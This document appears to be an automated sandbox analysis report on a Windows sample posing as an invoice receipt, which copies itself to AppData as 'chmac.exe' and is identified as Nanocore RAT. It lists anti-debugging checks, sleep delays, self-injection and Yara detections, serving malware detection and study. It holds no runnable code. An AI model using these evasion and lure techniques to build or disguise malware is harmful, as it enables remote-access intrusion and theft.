Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_004053AA
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 0_2_00402630 FindFirstFileA,	0_2_00402630
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 3_1_00404A29 FindFirstFileExW,	3_1_00404A29
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 13_2_00405D7C FindFirstFileA,FindClose,	13_2_00405D7C
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 13_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	13_2_004053AA
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 13_2_00402630 FindFirstFileA,	13_2_00402630
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_00404A29 FindFirstFileExW,	14_2_00404A29
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_1_00404A29 FindFirstFileExW,	14_1_00404A29
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 15_2_00405D7C FindFirstFileA,FindClose,	15_2_00405D7C
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 15_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	15_2_004053AA
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 15_2_00402630 FindFirstFileA,	15_2_00402630
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_00404A29 FindFirstFileExW,	16_2_00404A29
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_1_00404A29 FindFirstFileExW,	16_1_00404A29

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	API call chain: ExitProcess graph end node	graph_0-3775
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	API call chain: ExitProcess graph end node	graph_0-3779
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	API call chain: ExitProcess graph end node	graph_3-5592
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	API call chain: ExitProcess graph end node	graph_13-3772
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	API call chain: ExitProcess graph end node	graph_13-3773
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

Code function: 3_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_1_0040446F

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

Code function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405DA3

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

Code function: 3_1_004067FE GetProcessHeap,

3_1_004067FE

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 0_2_0019DE9A mov eax, dword ptr fs:[00000030h]	0_2_0019DE9A
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 0_2_0019E19E mov eax, dword ptr fs:[00000030h]	0_2_0019E19E
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 0_2_0019E0AE mov eax, dword ptr fs:[00000030h]	0_2_0019E0AE
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 0_2_0019E1DC mov eax, dword ptr fs:[00000030h]	0_2_0019E1DC
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 0_2_0019E15F mov eax, dword ptr fs:[00000030h]	0_2_0019E15F
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 3_1_004035F1 mov eax, dword ptr fs:[00000030h]	3_1_004035F1
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 13_2_0019DE9A mov eax, dword ptr fs:[00000030h]	13_2_0019DE9A
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 13_2_0019E19E mov eax, dword ptr fs:[00000030h]	13_2_0019E19E
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 13_2_0019E0AE mov eax, dword ptr fs:[00000030h]	13_2_0019E0AE
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 13_2_0019E1DC mov eax, dword ptr fs:[00000030h]	13_2_0019E1DC
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 13_2_0019E15F mov eax, dword ptr fs:[00000030h]	13_2_0019E15F
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_004035F1 mov eax, dword ptr fs:[00000030h]	14_2_004035F1
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_1_004035F1 mov eax, dword ptr fs:[00000030h]	14_1_004035F1
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 15_2_0019E15F mov eax, dword ptr fs:[00000030h]	15_2_0019E15F
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 15_2_0019DE9A mov eax, dword ptr fs:[00000030h]	15_2_0019DE9A
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 15_2_0019E19E mov eax, dword ptr fs:[00000030h]	15_2_0019E19E
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 15_2_0019E0AE mov eax, dword ptr fs:[00000030h]	15_2_0019E0AE
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 15_2_0019E1DC mov eax, dword ptr fs:[00000030h]	15_2_0019E1DC
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_004035F1 mov eax, dword ptr fs:[00000030h]	16_2_004035F1
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_1_004035F1 mov eax, dword ptr fs:[00000030h]	16_1_004035F1

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 3_1_00401E1D SetUnhandledExceptionFilter,	3_1_00401E1D
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 3_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_1_0040446F
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 3_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_1_00401C88
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 3_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_1_00401F30
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_00401E1D SetUnhandledExceptionFilter,	14_2_00401E1D
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0040446F
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00401C88
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00401F30
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_1_00401E1D SetUnhandledExceptionFilter,	14_1_00401E1D
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_1_0040446F
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_1_00401C88
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_1_00401F30
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_00401E1D SetUnhandledExceptionFilter,	16_2_00401E1D
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_0040446F
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00401C88
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_00401F30
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_1_00401E1D SetUnhandledExceptionFilter,	16_1_00401E1D
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_1_0040446F
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_1_00401C88
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_1_00401F30

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Memory written: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Memory written: C:\Users\user\AppData\Roaming\dihsw\chmac.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Memory written: C:\Users\user\AppData\Roaming\dihsw\chmac.exe base: 400000 value starts with: 4D5A	Jump to behavior

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process created: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe "C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process created: C:\Users\user\AppData\Roaming\dihsw\chmac.exe "C:\Users\user\AppData\Roaming\dihsw\chmac.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process created: C:\Users\user\AppData\Roaming\dihsw\chmac.exe "C:\Users\user\AppData\Roaming\dihsw\chmac.exe"	Jump to behavior

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

Code function: 3_1_0040208D cpuid

3_1_0040208D

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

Code function: 3_1_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_1_00401B74

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

Code function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405AA7

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 14.2.chmac.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.415058.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.38e3258.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.415058.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.415058.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.415058.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.4830000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.1.chmac.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.37b0e54.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.658288.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.24b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.415058.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.50a9b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.658288.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.1.chmac.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.chmac.exe.3011458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.1.chmac.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.415058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.1.chmac.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.1.chmac.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.chmac.exe.3000000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.415058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.chmac.exe.2540000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.chmac.exe.2551458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.37ac01e.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.chmac.exe.3011458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.37b547d.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.3960e54.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.3733258.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.chmac.exe.3000000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.50a9b8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.3960e54.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.2260000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.2260000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.2500000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.24b0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.415058.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.chmac.exe.2551458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.415058.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.395c01e.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.37b0e54.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.3733258.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.415058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.415058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.396547d.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.38e3258.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.1.chmac.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.415058.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.chmac.exe.2540000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.341257135.0000000003731000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.322700795.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.323810648.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.359331974.00000000024B0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.327158537.0000000003000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.358998677.0000000000644000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.341406619.0000000004832000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.341081024.0000000002260000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.339547057.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.344485087.0000000002540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.340666322.00000000004F4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.359590843.00000000038E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.341018876.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.297135620.00000000030A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.340553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.358899493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.359622615.000000000391A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.341299575.000000000376A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.293187290.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.294042312.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.359413916.0000000002502000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 6964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 7092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chmac.exe PID: 6288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chmac.exe PID: 6556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chmac.exe PID: 6760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chmac.exe PID: 6820, type: MEMORYSTR

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: G2M8C76V_INV0ICE_RECEIPT.exe, 00000000.00000002.297135620.00000000030A0000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: G2M8C76V_INV0ICE_RECEIPT.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: G2M8C76V_INV0ICE_RECEIPT.exe, 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: chmac.exe, 0000000D.00000002.327158537.0000000003000000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: chmac.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: chmac.exe, 0000000E.00000002.341257135.0000000003731000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: chmac.exe, 0000000E.00000000.322700795.0000000000414000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: chmac.exe, 0000000E.00000002.341406619.0000000004832000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: chmac.exe, 0000000E.00000002.341081024.0000000002260000.00000004.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: chmac.exe, 0000000E.00000002.340553109.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: chmac.exe, 0000000E.00000002.341299575.000000000376A000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: chmac.exe, 0000000E.00000002.341299575.000000000376A000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: chmac.exe, 0000000E.00000002.341227508.000000000273E000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
